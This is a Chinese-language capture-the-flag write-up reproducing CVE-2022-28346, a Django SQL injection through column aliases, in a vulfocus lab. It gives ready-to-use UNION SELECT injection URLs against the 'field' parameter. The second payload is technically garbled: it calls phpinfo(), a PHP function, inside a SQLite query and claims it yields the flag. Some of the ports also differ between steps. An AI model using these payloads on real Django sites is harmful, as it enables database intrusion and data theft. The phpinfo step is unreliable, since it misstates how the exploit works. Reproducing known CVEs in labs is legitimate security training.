---
title: CVE-2022-28346 Django SQL注入
date: 2023-02-11 17:21:40
tags: [CVE漏洞,SQL注入]
categories: CVE漏洞复现
---

###  影响范围：

- 4.0 <= Django < 4.0.4
- 3.2 <= Django < 3.2.13
- 2.2 <= Django < 2.2.28

<!-- more -->

### 一、Django简介

Python下有许多款不同的 Web 框架。Django是重量级选手中最有代表性的一位。许多成功的网站和APP都基于Django，Django 是一个开放源代码的 Web 应用框架，由 Python 写成。



### 二、影响范围

- 4.0 <= Django < 4.0.4
- 3.2 <= Django < 3.2.13
- 2.2 <= Django < 2.2.28



### 三、漏洞简介

 在 2.2.28 之前的 Django 2.2、3.2.13 之前的 3.2 和 4.0.4 之前的 4.0 中发现了一个问题。QuerySet.annotate()、aggregate() 和 extra() 方法会通过精心制作的字典（带有字典扩展）作为传递的 **kwargs 在列别名中进行 SQL 注入



###  四、漏洞复现：

**1.打开靶场环境**

​		在vulfocus靶场中拉取CVE-2022-28346漏洞镜像，将其打开

<img src="CVE-2022-28346-Django-SQL%E6%B3%A8%E5%85%A5/image-20230211173653919.png" alt="image-20230211173653919" style="zoom:80%;" />

**2.访问给出的地址**

http://10.0.0.128:22774

![image-20230211173950989](CVE-2022-28346-Django-SQL%E6%B3%A8%E5%85%A5/image-20230211173950989.png)

通过查看404页面发现目录 demo/

![image-20230211175913032](CVE-2022-28346-Django-SQL%E6%B3%A8%E5%85%A5/image-20230211175913032.png)

进入demo查看，发现报错：

![image-20230211180052845](CVE-2022-28346-Django-SQL%E6%B3%A8%E5%85%A5/image-20230211180052845.png)

报错信息：the annotation 'name' conficts with a field on the model 

使用报错信息 demo?field=demo.name 构造POC 

```http
POC:  http://10.0.0.128:24115/demo/?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
```

![image-20230211174011623](CVE-2022-28346-Django-SQL%E6%B3%A8%E5%85%A5/image-20230211174011623.png)

**3.获取flag**

在此注入发现版本号3.34.1，重新改造POC 

```http
POC:  http://10.0.0.128:24115/demo/?field=demo.name" FROM "demo_user" union SELECT "1",phpinfo(),"3" --
```

通过ctrl+F 搜索 flag，取得最终的flag

![image-20230211174718552](CVE-2022-28346-Django-SQL%E6%B3%A8%E5%85%A5/image-20230211174718552.png)

```
flag-{bmh1059bd0b-be31-45cc-bb24-276b1735076f}
```

